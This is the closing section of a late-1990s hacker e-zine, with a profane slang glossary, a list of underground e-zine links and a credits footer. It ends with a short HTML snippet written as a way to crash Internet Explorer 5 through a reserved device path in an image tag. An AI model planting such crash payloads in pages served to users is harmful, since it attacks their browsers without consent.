                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
            
A.11  NEW Underground E-Zines
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      New releases:
      
      SET Saqueadores Edicin Tcnica: http://www.set-ezine.org
      f41th magazine issue 12 is out.: http://f41th.com/index2.html
      Digital Defiance 5 (!) is out..: http://www.hackers.cx
      
      
      New zines on the scene:       

      InET.......................... http://www.warpedreality.com/inet
      Hack In the Box............... http://www.thelimit.net/hitb      
      Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt      
      DataZine...................... http://www.tdcore.com
      Napalm........................ http://napalm.firest0rm.org/
      Digital Defiance.............. http://www.hackers.cx  
      
      
            
   @HWA            
   
   

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

     1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]    



<HTML>
<BODY>
Crashing your MSIE 5 browser:
<IMG SRC="c:\con\con">
</BODY>
</HTML>

